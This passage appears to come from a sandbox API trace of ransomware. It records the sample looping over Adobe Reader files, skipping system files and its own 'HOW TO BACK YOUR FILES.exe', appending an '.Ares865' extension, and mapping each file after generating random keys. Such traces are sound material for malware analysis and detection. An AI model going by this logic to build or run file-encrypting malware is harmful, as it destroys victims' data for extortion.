dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.331] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16289) returned 1 [0154.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.331] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.332] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.332] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.332] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x42b0, lpName=0x0) returned 0x170 [0154.336] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42b0) returned 0x190000 [0154.337] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.338] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.338] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.338] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.339] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.339] CloseHandle (hObject=0x170) returned 1 [0154.339] CloseHandle (hObject=0x118) returned 1 [0154.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.339] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4623, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeCZE.htm", cAlternateFileName="REE3F7~1.HTM")) returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="aoldtz.exe") returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2=".") returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="..") returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="windows") returned -1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="bootmgr") returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="temp") returned -1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="pagefile.sys") returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="boot") returned 1 [0154.339] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="ids.txt") returned 1 [0154.340] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="ntuser.dat") returned 1 [0154.340] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="perflogs") returned 1 [0154.340] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2="MSBuild") returned 1 [0154.340] lstrlenW (lpString="ReadMeCZE.htm") returned 13 [0154.340] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm") returned 53 [0154.340] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeCZE.htm" | out: lpString1="ReadMeCZE.htm") returned="ReadMeCZE.htm" [0154.340] lstrlenW (lpString="ReadMeCZE.htm") returned 13 [0154.340] lstrlenW (lpString="Ares865") returned 7 [0154.340] lstrcmpiW (lpString1="CZE.htm", lpString2="Ares865") returned 1 [0154.340] lstrlenW (lpString=".dll") returned 4 [0154.340] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2=".dll") returned 1 [0154.340] lstrlenW (lpString=".lnk") returned 4 [0154.340] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2=".lnk") returned 1 [0154.340] lstrlenW (lpString=".ini") returned 4 [0154.340] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2=".ini") returned 1 [0154.340] lstrlenW (lpString=".sys") returned 4 [0154.340] lstrcmpiW (lpString1="ReadMeCZE.htm", lpString2=".sys") returned 1 [0154.340] lstrlenW (lpString="ReadMeCZE.htm") returned 13 [0154.340] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm.Ares865") returned 62 [0154.341] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm.ares865"), dwFlags=0x1) returned 1 [0154.343] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.343] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17955) returned 1 [0154.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.343] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.344] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.344] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.344] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4930, lpName=0x0) returned 0x170 [0154.346] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4930) returned 0x190000 [0154.349] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.350] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.350] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.351] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.351] CloseHandle (hObject=0x170) returned 1 [0154.351] CloseHandle (hObject=0x118) returned 1 [0154.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.351] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeHRV.htm", cAlternateFileName="RE2D2E~1.HTM")) returned 1 [0154.351] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="aoldtz.exe") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2=".") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="..") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="windows") returned -1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="bootmgr") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="temp") returned -1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="pagefile.sys") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="boot") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="ids.txt") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="ntuser.dat") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="perflogs") returned 1 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2="MSBuild") returned 1 [0154.352] lstrlenW (lpString="ReadMeHRV.htm") returned 13 [0154.352] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm") returned 54 [0154.352] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeHRV.htm" | out: lpString1="ReadMeHRV.htm") returned="ReadMeHRV.htm" [0154.352] lstrlenW (lpString="ReadMeHRV.htm") returned 13 [0154.352] lstrlenW (lpString="Ares865") returned 7 [0154.352] lstrcmpiW (lpString1="HRV.htm", lpString2="Ares865") returned 1 [0154.352] lstrlenW (lpString=".dll") returned 4 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2=".dll") returned 1 [0154.352] lstrlenW (lpString=".lnk") returned 4 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2=".lnk") returned 1 [0154.352] lstrlenW (lpString=".ini") returned 4 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2=".ini") returned 1 [0154.352] lstrlenW (lpString=".sys") returned 4 [0154.352] lstrcmpiW (lpString1="ReadMeHRV.htm", lpString2=".sys") returned 1 [0154.352] lstrlenW (lpString="ReadMeHRV.htm") returned 13 [0154.353] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm.Ares865") returned 62 [0154.353] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm.ares865"), dwFlags=0x1) returned 1 [0154.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.355] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17066) returned 1 [0154.355] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.355] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.355] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.355] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.356] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.356] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.356] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x45b0, lpName=0x0) returned 0x170 [0154.358] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x45b0) returned 0x190000 [0154.360] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.360] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.360] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.360] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.361] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.361] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.361] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.361] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.361] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.361] CloseHandle (hObject=0x170) returned 1 [0154.361] CloseHandle (hObject=0x118) returned 1 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.362] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4274, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeHUN.htm", cAlternateFileName="RE50AF~1.HTM")) returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="aoldtz.exe") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2=".") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="..") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="windows") returned -1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="bootmgr") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="temp") returned -1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="pagefile.sys") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="boot") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="ids.txt") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="ntuser.dat") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="perflogs") returned 1 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2="MSBuild") returned 1 [0154.362] lstrlenW (lpString="ReadMeHUN.htm") returned 13 [0154.362] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm") returned 54 [0154.362] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeHUN.htm" | out: lpString1="ReadMeHUN.htm") returned="ReadMeHUN.htm" [0154.362] lstrlenW (lpString="ReadMeHUN.htm") returned 13 [0154.362] lstrlenW (lpString="Ares865") returned 7 [0154.362] lstrcmpiW (lpString1="HUN.htm", lpString2="Ares865") returned 1 [0154.362] lstrlenW (lpString=".dll") returned 4 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2=".dll") returned 1 [0154.362] lstrlenW (lpString=".lnk") returned 4 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2=".lnk") returned 1 [0154.362] lstrlenW (lpString=".ini") returned 4 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2=".ini") returned 1 [0154.362] lstrlenW (lpString=".sys") returned 4 [0154.362] lstrcmpiW (lpString1="ReadMeHUN.htm", lpString2=".sys") returned 1 [0154.362] lstrlenW (lpString="ReadMeHUN.htm") returned 13 [0154.363] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm.Ares865") returned 62 [0154.363] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm.ares865"), dwFlags=0x1) returned 1 [0154.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.365] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17012) returned 1 [0154.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.365] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.366] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.366] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.366] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4580, lpName=0x0) returned 0x170 [0154.368] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4580) returned 0x190000 [0154.369] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.370] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.370] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.370] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.371] CloseHandle (hObject=0x170) returned 1 [0154.371] CloseHandle (hObject=0x118) returned 1 [0154.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.371] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeJ.htm", cAlternateFileName="")) returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="aoldtz.exe") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2=".") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="..") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="windows") returned -1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="bootmgr") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="temp") returned -1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="pagefile.sys") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="boot") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="ids.txt") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="ntuser.dat") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="perflogs") returned 1 [0154.371] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2="MSBuild") returned 1 [0154.372] lstrlenW (lpString="ReadMeJ.htm") returned 11 [0154.372] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm") returned 54 [0154.372] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeJ.htm" | out: lpString1="ReadMeJ.htm") returned="ReadMeJ.htm" [0154.372] lstrlenW (lpString="ReadMeJ.htm") returned 11 [0154.372] lstrlenW (lpString="Ares865") returned 7 [0154.372] lstrcmpiW (lpString1="MeJ.htm", lpString2="Ares865") returned 1 [0154.372] lstrlenW (lpString=".dll") returned 4 [0154.372] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2=".dll") returned 1 [0154.372] lstrlenW (lpString=".lnk") returned 4 [0154.372] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2=".lnk") returned 1 [0154.372] lstrlenW (lpString=".ini") returned 4 [0154.372] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2=".ini") returned 1 [0154.372] lstrlenW (lpString=".sys") returned 4 [0154.372] lstrcmpiW (lpString1="ReadMeJ.htm", lpString2=".sys") returned 1 [0154.372] lstrlenW (lpString="ReadMeJ.htm") returned 11 